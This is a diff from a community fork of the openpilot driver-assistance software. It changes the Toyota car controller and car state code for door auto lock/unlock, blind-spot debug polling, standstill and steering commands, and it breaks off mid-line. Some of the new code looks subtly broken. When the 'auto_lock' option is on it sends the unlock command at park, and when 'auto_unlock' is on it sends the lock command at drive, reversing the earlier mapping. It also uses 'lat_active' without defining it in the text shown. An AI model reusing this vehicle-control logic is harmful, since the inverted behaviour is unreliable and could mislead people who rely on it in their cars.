+62,31 @@ class CarController: self.standstill_req = False self.steer_rate_counter = 0 - self.steer_rate_counter = 0 - self.packer = CANPacker(dbc_name) self.gas = 0 self.accel = 0 - # dp - self.dp_toyota_sng = False + p = Params() + # dp - auto lock / unlock + self.dp_toyota_auto_lock = p.get_bool("dp_toyota_auto_lock") + self.dp_toyota_auto_unlock = p.get_bool("dp_toyota_auto_unlock") + self.dp_toyota_sng = p.get_bool("dp_toyota_sng") + self.dp_toyota_auto_lock_gear_prev = GearShifter.park + self.dp_toyota_auto_lock_once = False - self.dp_toyota_auto_lock = False - self.dp_toyota_auto_unlock = False - self.last_gear = GearShifter.park - self.lock_once = False - self.lat_controller_type = None - self.lat_controller_type_prev = None - self.blindspot_debug_enabled_left = False - self.blindspot_debug_enabled_right = False - self.blindspot_frame = 0 + # dp - bsm + self.dp_toyota_enhanced_bsm = p.get_bool("dp_toyota_enhanced_bsm") + self._blindspot_debug_enabled_left = False + self._blindspot_debug_enabled_right = False + self._blindspot_frame = 0 if self.CP.carFingerprint in TSS2_CAR: # tss2 can do higher hz then tss1 and can be on at all speed/standstill - self.blindspot_rate = 2 - self.blindspot_always_on = True + self._blindspot_rate = 2 + self._blindspot_always_on = True else: - self.blindspot_rate = 20 - self.blindspot_always_on = False + self._blindspot_rate = 20 + self._blindspot_always_on = False - def update(self, CC, CS, now_nanos, dragonconf): - if dragonconf is not None: - self.dp_toyota_sng = dragonconf.dpToyotaSng - self.dp_toyota_auto_lock = dragonconf.dpToyotaAutoLock - self.dp_toyota_auto_unlock = dragonconf.dpToyotaAutoUnlock - self.dp_toyota_debug_bsm = dragonconf.dpToyotaDebugBsm - self.lat_controller_type = CC.latController - if self.lat_controller_type != self.lat_controller_type_prev: - self.params.update(CC.latController) - self.lat_controller_type_prev = self.lat_controller_type - - self.dp_toyota_change5speed = Params().get_bool("dp_toyota_change5speed") + def update(self, CC, CS, now_nanos): actuators = CC.actuators hud_control = CC.hudControl pcm_cancel_cmd = CC.cruiseControl.cancel @@ -105,6 +95,60 @@ class CarController: # *** control msgs *** can_sends = [] + # dp - door auto lock / unlock logic + # thanks to AlexandreSato & cydia2020 + # https://github.com/AlexandreSato/animalpilot/blob/personal/doors.py + if not CS.out.doorOpen: + gear = CS.out.gearShifter + if gear == GearShifter.park and self.dp_toyota_auto_lock_gear_prev != gear: + if self.dp_toyota_auto_lock: + can_sends.append(make_can_msg(0x750, UNLOCK_CMD, 0)) + self.dp_toyota_auto_lock_once = False + elif gear == GearShifter.drive and not self.dp_toyota_auto_lock_once and CS.out.vEgo >= LOCK_AT_SPEED: + if self.dp_toyota_auto_unlock: + can_sends.append(make_can_msg(0x750, LOCK_CMD, 0)) + self.dp_toyota_auto_lock_once = True + self.dp_toyota_auto_lock_gear_prev = gear + + # Enable blindspot debug mode once (@arne182) + # let's keep all the commented out code for easy debug purpose for future. + if self.dp_toyota_enhanced_bsm: + if self.frame > 2000: + #left bsm + if not self._blindspot_debug_enabled_left: + if (self._blindspot_always_on or (CS.out.leftBlinker and CS.out.vEgo > 6)): # eagle eye camera will stop working if right bsm is switched on under 6m/s + can_sends.append(set_blindspot_debug_mode(LEFT_BLINDSPOT, True)) + self._blindspot_debug_enabled_left = True + # print("bsm debug left, on") + else: + if not self._blindspot_always_on and not CS.out.leftBlinker and self.frame - self._blindspot_frame > 500: + can_sends.append(set_blindspot_debug_mode(LEFT_BLINDSPOT, False)) + self._blindspot_debug_enabled_left = False + # print("bsm debug left, off") + if self.frame % self._blindspot_rate == 0: + can_sends.append(poll_blindspot_status(LEFT_BLINDSPOT)) + if CS.out.leftBlinker: + self._blindspot_frame = self.frame + # print(self._blindspot_frame) + # print("bsm poll left") + #right bsm + if not self._blindspot_debug_enabled_right: + if (self._blindspot_always_on or (CS.out.rightBlinker and CS.out.vEgo > 6)): # eagle eye camera will stop working if right bsm is switched on under 6m/s + can_sends.append(set_blindspot_debug_mode(RIGHT_BLINDSPOT, True)) + self._blindspot_debug_enabled_right = True + # print("bsm debug right, on") + else: + if not self._blindspot_always_on and not CS.out.rightBlinker and self.frame - self._blindspot_frame > 500: + can_sends.append(set_blindspot_debug_mode(RIGHT_BLINDSPOT, False)) + self._blindspot_debug_enabled_right = False + # print("bsm debug right, off") + if self.frame % self._blindspot_rate == self._blindspot_rate/2: + can_sends.append(poll_blindspot_status(RIGHT_BLINDSPOT)) + if CS.out.rightBlinker: + self._blindspot_frame = self.frame + # print(self._blindspot_frame) + # print("bsm poll right") + # *** steer torque *** new_steer = int(round(actuators.steer * self.params.STEER_MAX)) apply_steer = apply_meas_steer_torque_limits(new_steer, self.last_steer, CS.out.steeringTorqueEps, self.params) @@ -135,7 +179,7 @@ class CarController: # Angular rate limit based on speed apply_angle = apply_std_steer_angle_limits(apply_angle, self.last_angle, CS.out.vEgo, self.params) - if not CC.latActive: + if not lat_active: apply_angle = CS.out.steeringAngleDeg + CS.out.steeringAngleOffsetDeg self.last_angle = clip(apply_angle, -MAX_STEER_ANGLE, MAX_STEER_ANGLE) @@ -147,8 +191,11 @@ class CarController: # on consecutive messages can_sends.append(create_steer_command(self.packer, apply_steer, apply_steer_req)) if self.frame % 2 == 0 and self.CP.carFingerprint in TSS2_CAR: - lta_active = CC.latActive and self.CP.steerControlType == SteerControlType.angle - can_sends.append(create_lta_steer_command(self.packer, self.last_angle, lta_active, self.frame // 2)) + lta_active = lat_active and self.CP.steerControlType == SteerControlType.angle + full_torque_condition = (abs(CS.out.steeringTorqueEps) < self.params.STEER_MAX and + abs(CS.out.steeringTorque) < MAX_DRIVER_TORQUE_ALLOWANCE) + setme_x64 = 100 if lta_active and full_torque_condition else 0 + can_sends.append(create_lta_steer_command(self.packer, self.last_angle, lta_active, self.frame // 2, setme_x64)) # *** gas and brake *** if self.CP.enableGasInterceptor and CC.longActive: @@ -174,69 +221,14 @@ class CarController: pcm_cancel_cmd = 1 # on entering standstill, send standstill request - if CS.out.standstill and not self.last_standstill and (self.CP.carFingerprint not in NO_STOP_TIMER_CAR or self.CP.enableGasInterceptor): + if not self.dp_toyota_sng and CS.out.standstill and not self.last_standstill and (self.CP.carFingerprint not in NO_STOP_TIMER_CAR or self.CP.enableGasInterceptor): self.standstill_req = True if CS.pcm_acc_status != 8: # pcm entered standstill or it's disabled self.standstill_req = False - self.standstill_req = False if self.dp_toyota_sng else self.standstill_req self.last_standstill = CS.out.standstill - # dp - door auto lock / unlock logic - # thanks to AlexandreSato & cydia2020 - # https://github.com/AlexandreSato/animalpilot/blob/personal/doors.py - if self.dp_toyota_auto_lock or self.dp_toyota_auto_unlock: - gear = CS.out.gearShifter - if self.last_gear != gear and gear == GearShifter.park: - if self.dp_toyota_auto_unlock: - can_sends.append(make_can_msg(0x750, UNLOCK_CMD, 0)) - if self.dp_toyota_auto_lock: - self.lock_once = False - elif self.dp_toyota_auto_lock and not CS.out.doorOpen and gear == GearShifter.drive and not self.lock_once and CS.out.vEgo >= LOCK_AT_SPEED: - can_sends.append(make_can_msg(0x750, LOCK_CMD, 0)) - self.lock_once = True - self.last_gear = gear - - # Enable blindspot debug mode once (@arne182) - # let's keep all the commented out code for easy debug purpose for future. - if self.dp_toyota_debug_bsm: - if self.frame > 2000: - #left bsm - if not self.blindspot_debug_enabled_left: - if (self.blindspot_always_on or (CS.out.leftBlinker and CS.out.vEgo > 6)): # eagle eye camera will stop working if right bsm is switched on under 6m/s - can_sends.append(set_blindspot_debug_mode(LEFT_BLINDSPOT, True)) - self.blindspot_debug_enabled_left = True - # print("bsm debug left, on") - else: - if not self.blindspot_always_on and not CS.out.leftBlinker and self.frame - self.blindspot_frame > 500: - can_sends.append(set_blindspot_debug_mode(LEFT_BLINDSPOT, False)) - self.blindspot_debug_enabled_left = False - # print("bsm debug left, off") - if self.frame % self.blindspot_rate == 0: - can_sends.append(poll_blindspot_status(LEFT_BLINDSPOT)) - if CS.out.leftBlinker: - self.blindspot_frame = self.frame - # print(self.blindspot_frame) - # print("bsm poll left") - #right bsm - if not self.blindspot_debug_enabled_right: - if (self.blindspot_always_on or (CS.out.rightBlinker and CS.out.vEgo > 6)): # eagle eye camera will stop working if right bsm is switched on under 6m/s - can_sends.append(set_blindspot_debug_mode(RIGHT_BLINDSPOT, True)) - self.blindspot_debug_enabled_right = True - # print("bsm debug right, on") - else: - if not self.blindspot_always_on and not CS.out.rightBlinker and self.frame - self.blindspot_frame > 500: - can_sends.append(set_blindspot_debug_mode(RIGHT_BLINDSPOT, False)) - self.blindspot_debug_enabled_right = False - # print("bsm debug right, off") - if self.frame % self.blindspot_rate == self.blindspot_rate/2: - can_sends.append(poll_blindspot_status(RIGHT_BLINDSPOT)) - if CS.out.rightBlinker: - self.blindspot_frame = self.frame - # print(self.blindspot_frame) - # print("bsm poll right") - # we can spam can to cancel the system even if we are using lat only control if (self.frame % 3 == 0 and self.CP.openpilotLongitudinalControl) or pcm_cancel_cmd: lead = hud_control.leadVisible or CS.out.vEgo < 12. # at low speed we always assume the lead is present so ACC can be engaged @@ -245,10 +237,10 @@ class CarController: if pcm_cancel_cmd and self.CP.carFingerprint in UNSUPPORTED_DSU_CAR: can_sends.append(create_acc_cancel_command(self.packer)) elif self.CP.openpilotLongitudinalControl: - can_sends.append(create_accel_command(self.packer, pcm_accel_cmd, pcm_cancel_cmd, self.standstill_req, lead, CS.acc_type, CS.distance, self.dp_toyota_change5speed)) + can_sends.append(create_accel_command(self.packer, pcm_accel_cmd, pcm_cancel_cmd, self.standstill_req, lead, CS.acc_type)) self.accel = pcm_accel_cmd else: - can_sends.append(create_accel_command(self.packer, 0, pcm_cancel_cmd, False, lead, CS.acc_type, CS.distance, self.dp_toyota_change5speed)) + can_sends.append(create_accel_command(self.packer, 0, pcm_cancel_cmd, False, lead, CS.acc_type)) if self.frame % 2 == 0 and self.CP.enableGasInterceptor and self.CP.openpilotLongitudinalControl: # send exactly zero if gas cmd is zero. Interceptor will send the max between read value and gas cmd. @@ -276,7 +268,7 @@ class CarController: if self.frame % 20 == 0 or send_ui: can_sends.append(create_ui_command(self.packer, steer_alert, pcm_cancel_cmd, hud_control.leftLaneVisible, hud_control.rightLaneVisible, hud_control.leftLaneDepart, - hud_control.rightLaneDepart, CC.latActive, CS.lkas_hud)) + hud_control.rightLaneDepart, CC.enabled, CS.lkas_hud)) if (self.frame % 100 == 0 or send_ui) and self.CP.enableDsu: can_sends.append(create_fcw_command(self.packer, fcw_alert)) diff --git a/selfdrive/car/toyota/carstate.py b/selfdrive/car/toyota/carstate.py index b64a1f067..37765304c 100644 --- a/selfdrive/car/toyota/carstate.py +++ b/selfdrive/car/toyota/carstate.py @@ -9,22 +9,7 @@ from opendbc.can.can_define import CANDefine from opendbc.can.parser import CANParser from selfdrive.car.interfaces import CarStateBase from selfdrive.car.toyota.values import ToyotaFlags, CAR, DBC, STEER_THRESHOLD, NO_STOP_TIMER_CAR, TSS2_CAR, RADAR_ACC_CAR, EPS_SCALE, UNSUPPORTED_DSU_CAR - -from common.params import Params, put_nonblocking -import time -from math import floor - -# dp -DP_ACCEL_ECO = 0 -DP_ACCEL_NORMAL = 1 -DP_ACCEL_SPORT = 2 - -_TRAFFIC_SINGAL_MAP = { - 1: "kph", - 36: "mph", - 65: "No overtake", - 66: "No overtake" -} +from common.params import Params SteerControlType = car.CarParams.SteerControlType @@ -35,6 +20,9 @@ SteerControlType = car.CarParams.SteerControlType # - initializing: LTA can report 0 as long as STEER_TORQUE_SENSOR->STEER_ANGLE_INITIALIZING is 1, # and is a catch-all for LKA TEMP_STEER_FAULTS = (0, 9, 11, 21, 25) +# - lka/lta msg drop out: 3 (recoverable) +# - prolonged high driver torque: 17 (permanent) +PERM_STEER_FAULTS = (3, 17) class CarState(CarStateBase): @@ -51,44 +39,24 @@ class CarState(CarStateBase): # Need to apply an offset as soon as the steering angle measurements are both received self.accurate_steer_angle_seen = False self.angle_offset = FirstOrderFilter(None, 60.0, DT_CTRL, initialized=False) - self._init_traffic_signals() self.low_speed_lockout = False self.acc_type = 1 self.lkas_hud = {} - #dp - self.frame = 0 - self.dp_sig_check = False - self.dp_sig_sport_on_seen = True - self.dp_sig_econ_on_seen = True - self.dp_accel_profile = None - self.dp_accel_profile_prev = None - self.dp_accel_profile_init = False - self.dp_toyota_ap_btn_link = Params().get_bool('dp_toyota_ap_btn_link') - self.read_distance_lines = 0 - self.read_distance_lines_init = False - self.distance = 0 - self.dp_toyota_fp_btn_link = Params().get_bool('dp_toyota_fp_btn_link') - - # zss - self.dp_toyota_zss = Params().get_bool('dp_toyota_zss') - self.dp_zss_compute = False - self.dp_zss_cruise_active_last = False - self.dp_zss_angle_offset = 0. - # bsm - self.dp_toyota_debug_bsm = Params().get_bool('dp_toyota_debug_bsm') + self.dp_toyota_enhanced_bsm = Params().get_bool('dp_toyota_enhanced_bsm') + self._left_blindspot = False + self._left_blindspot_d1 = 0 + self._left_blindspot_d2 = 0 + self._left_blindspot_counter = 0 - self.left_blindspot = False - self.left_blindspot_d1 = 0 - self.left_blindspot_d2 = 0 - self.left_blindspot_counter = 0 + self._right_blindspot = False + self._right_blindspot_d1 = 0 + self._right_blindspot_d2 = 0 + self._right_blindspot_counter = 0 - self.right_blindspot = False - self.right_blindspot_d1 = 0 - self.right_blindspot_d2 = 0 - self.right_blindspot_counter = 0 + self.frame = 0 def update(self, cp, cp_cam): ret = car.CarState.new_message() @@ -99,8 +67,7 @@ class CarState(CarStateBase): ret.parkingBrake = cp.vl["BODY_CONTROL_STATE"]["PARKING_BRAKE"] == 1 ret.brakePressed = cp.vl["BRAKE_MODULE"]["BRAKE_PRESSED"] != 0 - #ret.brakeHoldActive = cp.vl["ESP_CONTROL"]["BRAKE_HOLD_ACTIVE"] == 1 - ret.brakeLightsDEPRECATED = bool(cp.vl["ESP_CONTROL"]['BRAKE_LIGHTS_ACC'] or cp.vl["BRAKE_MODULE"]["BRAKE_PRESSED"] != 0) + ret.brakeHoldActive = cp.vl["ESP_CONTROL"]["BRAKE_HOLD_ACTIVE"] == 1 if self.CP.enableGasInterceptor: ret.gas = (cp.vl["GAS_SENSOR"]["INTERCEPTOR_GAS"] + cp.vl["GAS_SENSOR"]["INTERCEPTOR_GAS2"]) // 2 ret.gasPressed = ret.gas > 805 @@ -138,85 +105,10 @@ class CarState(CarStateBase): ret.steeringAngleOffsetDeg = self.angle_offset.x ret.steeringAngleDeg = torque_sensor_angle_deg - self.angle_offset.x - # dp - toyota zss - if self.dp_toyota_zss: - zorro_steer = cp.vl["SECONDARY_STEER_ANGLE"]["ZORRO_STEER"] - # only compute zss offset when acc is active - if bool(cp.vl["PCM_CRUISE"]["CRUISE_ACTIVE"]) and not self.dp_zss_cruise_active_last: - self.dp_zss_compute = True # cruise was just activated, so allow offset to be recomputed - self.dp_zss_cruise_active_last = bool(cp.vl["PCM_CRUISE"]["CRUISE_ACTIVE"]) - - # compute zss offset - if self.dp_zss_compute: - if abs(ret.steeringAngleDeg) > 1e-3 and abs(zorro_steer) > 1e-3: - self.dp_toyota_zss = False - self.dp_zss_angle_offset = zorro_steer - ret.steeringAngleDeg - # apply offset - ret.steeringAngleDeg = zorro_steer - self.dp_zss_angle_offset - ret.steeringRateDeg = cp.vl["STEER_ANGLE_SENSOR"]["STEER_RATE"] can_gear = int(cp.vl["GEAR_PACKET"]["GEAR"]) ret.gearShifter = self.parse_gear_shifter(self.shifter_values.get(can_gear, None)) - - #dp: Thank you Arne (acceleration) - if self.dp_toyota_ap_btn_link: - sport_on_sig = 'SPORT_ON_2' if self.CP.carFingerprint in (CAR.RAV4_TSS2, CAR.LEXUS_ES_TSS2, CAR.HIGHLANDER_TSS2) else 'SPORT_ON' - # check signal once - if not self.dp_sig_check: - self.dp_sig_check = True - # sport on - try: - sport_on = cp.vl["GEAR_PACKET"][sport_on_sig] - except KeyError: - sport_on = 0 - self.dp_sig_sport_on_seen = False - # econ on - try: - econ_on = cp.vl["GEAR_PACKET"]['ECON_ON'] - except KeyError: - econ_on = 0 - self.dp_sig_econ_on_seen = False - else: - sport_on = cp.vl["GEAR_PACKET"][sport_on_sig] if self.dp_sig_sport_on_seen else 0 - econ_on = cp.vl["GEAR_PACKET"]['ECON_ON'] if self.dp_sig_econ_on_seen else 0 - - if sport_on == 0 and econ_on == 0: - self.dp_accel_profile = DP_ACCEL_NORMAL - elif sport_on == 1: - self.dp_accel_profile = DP_ACCEL_SPORT - elif econ_on == 1: - self.dp_accel_profile = DP_ACCEL_ECO - - # if init is false, we sync profile with whatever mode we have on car - if not self.dp_accel_profile_init or self.dp_accel_profile != self.dp_accel_profile_prev: - put_nonblocking('dp_accel_profile', str(self.dp_accel_profile)) - put_nonblocking('dp_last_modified',str(floor(time.time()))) - self.dp_accel_profile_init = True - self.dp_accel_profile_prev = self.dp_accel_profile - - # distance button - - #dp: Thank you Arne (distance button) - if self.dp_toyota_fp_btn_link: - if not self.read_distance_lines_init or self.read_distance_lines != cp.vl["PCM_CRUISE_SM"]['DISTANCE_LINES']: - self.read_distance_lines_init = True - self.read_distance_lines = cp.vl["PCM_CRUISE_SM"]['DISTANCE_LINES'] - put_nonblocking('dp_following_profile', str(int(max(self.read_distance_lines - 1, 0)))) # Skipping one profile toyota mid is weird. - put_nonblocking('dp_last_modified',str(floor(time.time()))) - - if self.CP.carFingerprint in (TSS2_CAR - RADAR_ACC_CAR): - # KRKeegan - Add support for toyota distance button - self.distance = 1 if cp_cam.vl["ACC_CONTROL"]["DISTANCE"] == 1 else 0 - ret.distanceLines = cp.vl["PCM_CRUISE_SM"]["DISTANCE_LINES"] - - if self.CP.carFingerprint in RADAR_ACC_CAR: - # KRKeegan - Add support for toyota distance button these cars have the acc_control on car can - self.distance = 1 if cp.vl["ACC_CONTROL"]["DISTANCE"] == 1 else 0 - ret.distanceLines = cp.vl["PCM_CRUISE_SM"]["DISTANCE_LINES"] - #dp - ret.engineRpm = cp.vl["ENGINE_RPM"]['RPM'] - ret.leftBlinker = cp.vl["BLINKERS_STATE"]["TURN_SIGNALS"] == 1 ret.rightBlinker = cp.vl["BLINKERS_STATE"]["TURN_SIGNALS"] == 2 @@ -227,13 +119,11 @@ class CarState(CarStateBase): # Check EPS LKA/LTA fault status ret.steerFaultTemporary = cp.vl["EPS_STATUS"]["LKA_STATE"] in TEMP_STEER_FAULTS - # 3 is a fault from the lka command message not being received by the EPS (recoverable) - # 17 is a fault from a prolonged high torque delta between cmd and user (permanent) - ret.steerFaultPermanent = cp.vl["EPS_STATUS"]["LKA_STATE"] in (3, 17) + ret.steerFaultPermanent = cp.vl["EPS_STATUS"]["LKA_STATE"] in PERM_STEER_FAULTS if self.CP.steerControlType == SteerControlType.angle: ret.steerFaultTemporary = ret.steerFaultTemporary or cp.vl["EPS_STATUS"]["LTA_STATE"] in TEMP_STEER_FAULTS - ret.steerFaultPermanent = ret.steerFaultPermanent or cp.vl["EPS_STATUS"]["LTA_STATE"] in (3,) + ret.steerFaultPermanent = ret.steerFaultPermanent or cp.vl["EPS_STATUS"]["LTA_STATE"] in PERM_STEER_FAULTS if self.CP.carFingerprint in UNSUPPORTED_DSU_CAR: # TODO: find the bit likely in DSU_CRUISE that describes an ACC fault. one may also exist in CLUTCH @@ -286,136 +176,54 @@ class CarState(CarStateBase): # Enable blindspot debug mode once (@arne182) # let's keep all the commented out code for easy debug purpose for future. - if self.dp_toyota_debug_bsm and self.frame > 1999: #self.CP.carFingerprint == CAR.PRIUS_TSS2: #not (self.CP.carFingerprint in TSS2_CAR or self.CP.carFingerprint == CAR.CAMRY or self.CP.carFingerprint == CAR.CAMRYH): - distance_1 = cp.vl["DEBUG"].get('BLINDSPOTD1') - distance_2 = cp.vl["DEBUG"].get('BLINDSPOTD2') - side = cp.vl["DEBUG"].get('BLINDSPOTSIDE') + if self.dp_toyota_enhanced_bsm and self.frame > 1999: #self.CP.carFingerprint == CAR.PRIUS_TSS2: #not (self.CP.carFingerprint in TSS2_CAR or self.CP.carFingerprint == CAR.CAMRY or self.CP.carFingerprint == CAR.CAMRYH): + distance_1 = cp.vl["DEBUG"].get('BLINDSPOTD1') + distance_2 = cp.vl["DEBUG"].get('BLINDSPOTD2') + side = cp.vl["DEBUG"].get('BLINDSPOTSIDE') - if distance_1 is not None and distance_2 is not None and side is not None: - if side == 65: # Left blind spot - if distance_1 != self.left_blindspot_d1: - self.left_blindspot_d1 = distance_1 - self.left_blindspot_counter = 100 - if distance_2 != self.left_blindspot_d2: - self.left_blindspot_d2 = distance_2 - self.left_blindspot_counter = 100 - if self.left_blindspot_d1 > 10 or self.left_blindspot_d2 > 10: - self.left_blindspot = True - elif side == 66: # Right blind spot - if distance_1 != self.right_blindspot_d1: - self.right_blindspot_d1 = distance_1 - self.right_blindspot_counter = 100 - if distance_2 != self.right_blindspot_d2: - self.right_blindspot_d2 = distance_2 - self.right_blindspot_counter = 100 - if self.right_blindspot_d1 > 10 or self.right_blindspot_d2 > 10: - self.right_blindspot = True + if distance_1 is not None and distance_2 is not None and side is not None: + if side == 65: # Left blind spot + if distance_1 != self._left_blindspot_d1: + self._left_blindspot_d1 = distance_1 + self._left_blindspot_counter = 100 + if distance_2 != self._left_blindspot_d2: + self._left_blindspot_d2 = distance_2 + self._left_blindspot_counter = 100 + if self._left_blindspot_d1 > 10 or self._left_blindspot_d2 > 10: + self._left_blindspot = True + elif side == 66: # Right blind spot + if distance_1 != self._right_blindspot_d1: + self._right_blindspot_d1 = distance_1 + self._right_blindspot_counter = 100 + if distance_2 != self._right_blindspot_d2: + self._right_blindspot_d2 = distance_2 + self._right_blindspot_counter = 100 + if self._right_blindspot_d1 > 10 or self._right_blindspot_d2 > 10: + self._right_blindspot = True - if self.left_blindspot_counter > 0: - self.left_blindspot_counter -= 2 - else: - self.left_blindspot = False - self.left_blindspot_d1 = 0 - self.left_blindspot_d2 = 0 + if self._left_blindspot_counter > 0: + self._left_blindspot_counter -= 2 + else: + self._left_blindspot = False + self._left_blindspot_d1 = 0 + self._left_blindspot_d2 = 0 - if self.right_blindspot_counter > 0: - self.right_blindspot_counter -= 2 - else: - self.right_blindspot = False - self.right_blindspot_d1 = 0 - self.right_blindspot_d2 = 0 - - ret.leftBlindspot = self.left_blindspot - ret.rightBlindspot = self.right_blindspot + if self._right_blindspot_counter > 0: + self._right_blindspot_counter -= 2 + else: + self._right_blindspot = False + self._right_blindspot_d1 = 0 + self._right_blindspot_d2 = 0 + ret.leftBlindspot = self._left_blindspot + ret.rightBlindspot = self._right_blindspot if self.CP.carFingerprint != CAR.PRIUS_V: self.lkas_hud = copy.copy(cp_cam.vl["LKAS_HUD"]) - self._update_traffic_signals(cp_cam) - ret.cruiseState.speedLimit = self._calculate_speed_limit() - self.frame += 1 return ret - def _init_traffic_signals(self): - self._tsgn1 = None - self._spdval1 = None - self._splsgn1 = None - self._tsgn2 = None - self._splsgn2 = None - self._tsgn3 = None - self._splsgn3 = None - self._tsgn4 = None - self._splsgn4 = None - - def _update_traffic_signals(self, cp_cam): - # Print out car signals for traffic signal detection - tsgn1 = cp_cam.vl["RSA1"]['TSGN1'] - spdval1 = cp_cam.vl["RSA1"]['SPDVAL1'] - splsgn1 = cp_cam.vl["RSA1"]['SPLSGN1'] - tsgn2 = cp_cam.vl["RSA1"]['TSGN2'] - splsgn2 = cp_cam.vl["RSA1"]['SPLSGN2'] - tsgn3 = cp_cam.vl["RSA2"]['TSGN3'] - splsgn3 = cp_cam.vl["RSA2"]['SPLSGN3'] - tsgn4 = cp_cam.vl["RSA2"]['TSGN4'] - splsgn4 = cp_cam.vl["RSA2"]['SPLSGN4'] - - has_changed = tsgn1 != self._tsgn1 \ - or spdval1 != self._spdval1 \ - or splsgn1 != self._splsgn1 \ - or tsgn2 != self._tsgn2 \ - or splsgn2 != self._splsgn2 \ - or tsgn3 != self._tsgn3 \ - or splsgn3 != self._splsgn3 \ - or tsgn4 != self._tsgn4 \ - or splsgn4 != self._splsgn4 - - self._tsgn1 = tsgn1 - self._spdval1 = spdval1 - self._splsgn1 = splsgn1 - self._tsgn2 = tsgn2 - self._splsgn2 = splsgn2 - self._tsgn3 = tsgn3 - self._splsgn3 = splsgn3 - self._tsgn4 = tsgn4 - self._splsgn4 = splsgn4 - - if not has_changed: - return - - print('---- TRAFFIC SIGNAL UPDATE -----') - if tsgn1 is not None and tsgn1 != 0: - print(f'TSGN1: {self._traffic_signal_description(tsgn1)}') - if spdval1 is not None and spdval1 != 0: - print(f'SPDVAL1: {spdval1}') - if splsgn1 is not None and splsgn1 != 0: - print(f'SPLSGN1: {splsgn1}') - if tsgn2 is not None and tsgn2 != 0: - print(f'TSGN2: {self._traffic_signal_description(tsgn2)}') - if splsgn2 is not None and splsgn2 != 0: - print(f'SPLSGN2: {splsgn2}') - if tsgn3 is not None and tsgn3 != 0: - print(f'TSGN3: {self._traffic_signal_description(tsgn3)}') - if splsgn3 is not None and splsgn3 != 0: - print(f'SPLSGN3: {splsgn3}') - if tsgn4 is not None and tsgn4 != 0: - print(f'TSGN4: {self._traffic_signal_description(tsgn4)}') - if splsgn4 is not None and splsgn4 != 0: - print(f'SPLSGN4: {splsgn4}') - print('------------------------') - - def _traffic_signal_description(self, tsgn): - desc = _TRAFFIC_SINGAL_MAP.get(int(tsgn)) - return f'{tsgn}: {desc}' if desc is not None else f'{tsgn}' - - def _calculate_speed_limit(self): - if self._tsgn1 == 1: - return self._spdval1 * CV.KPH_TO_MS - if self._tsgn1 == 36: - return self._spdval1 * CV.MPH_TO_MS - return 0 - @staticmethod def get_can_parser(CP): signals = [ @@ -435,7 +243,7 @@ class CarState(CarStateBase): ("PARKING_BRAKE", "BODY_CONTROL_STATE"), ("UNITS", "BODY_CONTROL_STATE_2"), ("TC_DISABLED", "ESP_CONTROL"), - #("BRAKE_HOLD_ACTIVE", "ESP_CONTROL"), + ("BRAKE_HOLD_ACTIVE", "ESP_CONTROL"), ("STEER_FRACTION", "STEER_ANGLE_SENSOR"), ("STEER_RATE", "STEER_ANGLE_SENSOR"), ("CRUISE_ACTIVE", "PCM_CRUISE"), @@ -449,12 +257,6 @@ class CarState(CarStateBase): ("TURN_SIGNALS", "BLINKERS_STATE"), ("LKA_STATE", "EPS_STATUS"), ("AUTO_HIGH_BEAM", "LIGHT_STALK"), - #dp - ("SPORT_ON", "GEAR_PACKET"), - ("ECON_ON", "GEAR_PACKET"), - ("RPM", "ENGINE_RPM"), - ("BRAKE_LIGHTS_ACC", "ESP_CONTROL"), - ("DISTANCE_LINES", "PCM_CRUISE_SM"), ] # Check LTA state if using LTA angle control @@ -475,8 +277,6 @@ class CarState(CarStateBase): ("PCM_CRUISE", 33), ("PCM_CRUISE_SM", 1), ("STEER_TORQUE_SENSOR", 50), - #dp - ("ENGINE_RPM", 100), ] if CP.flags & ToyotaFlags.HYBRID: @@ -485,17 +285,6 @@ class CarState(CarStateBase): else: signals.append(("GAS_PEDAL", "GAS_PEDAL")) checks.append(("GAS_PEDAL", 33)) - #dp acceleration - if CP.carFingerprint in (CAR.RAV4_TSS2, CAR.LEXUS_ES_TSS2, CAR.HIGHLANDER_TSS2): - signals.append(("SPORT_ON_2", "GEAR_PACKET")) - - if CP.carFingerprint in (CAR.ALPHARD_TSS2, CAR.ALPHARDH_TSS2, CAR.AVALON_TSS2, CAR.AVALONH_TSS2, CAR.CAMRY_TSS2, CAR.CAMRYH_TSS2, CAR.CHR_TSS2, CAR.COROLLA_TSS2, CAR.COROLLAH_TSS2, CAR.HIGHLANDER_TSS2, CAR.HIGHLANDERH_TSS2, CAR.PRIUS_TSS2, CAR.RAV4H_TSS2, CAR.MIRAI, CAR.LEXUS_ES_TSS2, CAR.LEXUS_ESH_TSS2, CAR.LEXUS_NX_TSS2, CAR.LEXUS_NXH_TSS2, CAR.LEXUS_RX_TSS2, CAR.LEXUS_RXH_TSS2, CAR.CHRH): - signals.append(("SPORT_ON", "GEAR_PACKET")) - signals.append(("ECON_ON", "GEAR_PACKET")) - - if CP.flags & ToyotaFlags.SMART_DSU: - signals.append(("FD_BUTTON", "SDSU")) - checks.append(("SDSU", 0)) if CP.carFingerprint in UNSUPPORTED_DSU_CAR: signals.append(("MAIN_ON", "DSU_CRUISE")) @@ -516,8 +305,7 @@ class CarState(CarStateBase): signals.append(("INTERCEPTOR_GAS2", "GAS_SENSOR")) checks.append(("GAS_SENSOR", 50)) - - dp_toyota_debug_bsm = Params().get_bool('dp_toyota_debug_bsm') + dp_toyota_enhanced_bsm = Params().get_bool('dp_toyota_enhanced_bsm') if CP.enableBsm: signals += [ @@ -528,13 +316,14 @@ class CarState(CarStateBase): ] checks.append(("BSM", 1)) - if dp_toyota_debug_bsm: + if dp_toyota_enhanced_bsm: signals +=[ ("BLINDSPOT", "DEBUG"), ("BLINDSPOTSIDE", "DEBUG"), ("BLINDSPOTD1", "DEBUG"), ("BLINDSPOTD2", "DEBUG"), ] + checks.append(("DEBUG", 65)) if CP.carFingerprint in RADAR_ACC_CAR: if not CP.flags & ToyotaFlags.SMART_DSU.value: @@ -560,34 +349,12 @@ class CarState(CarStateBase): ("PRE_COLLISION", 33), ] - # dp - add zss signal check - if Params().get_bool('dp_toyota_zss'): - signals += [("ZORRO_STEER", "SECONDARY_STEER_ANGLE", 0)] - checks += [("SECONDARY_STEER_ANGLE", 0)] - return CANParser(DBC[CP.carFingerprint]["pt"], signals, checks, 0) @staticmethod def get_cam_can_parser(CP): - # Include traffic signal, single - signals = [ - ("TSGN1", "RSA1", 0), - ("SPDVAL1", "RSA1", 0), - ("SPLSGN1", "RSA1", 0), - ("TSGN2", "RSA1", 0), - ("SPLSGN2", "RSA1", 0), - ("TSGN3", "RSA2", 0), - ("SPLSGN3", "RSA2", 0), - ("TSGN4", "RSA2", 0), - ("SPLSGN4", "RSA2", 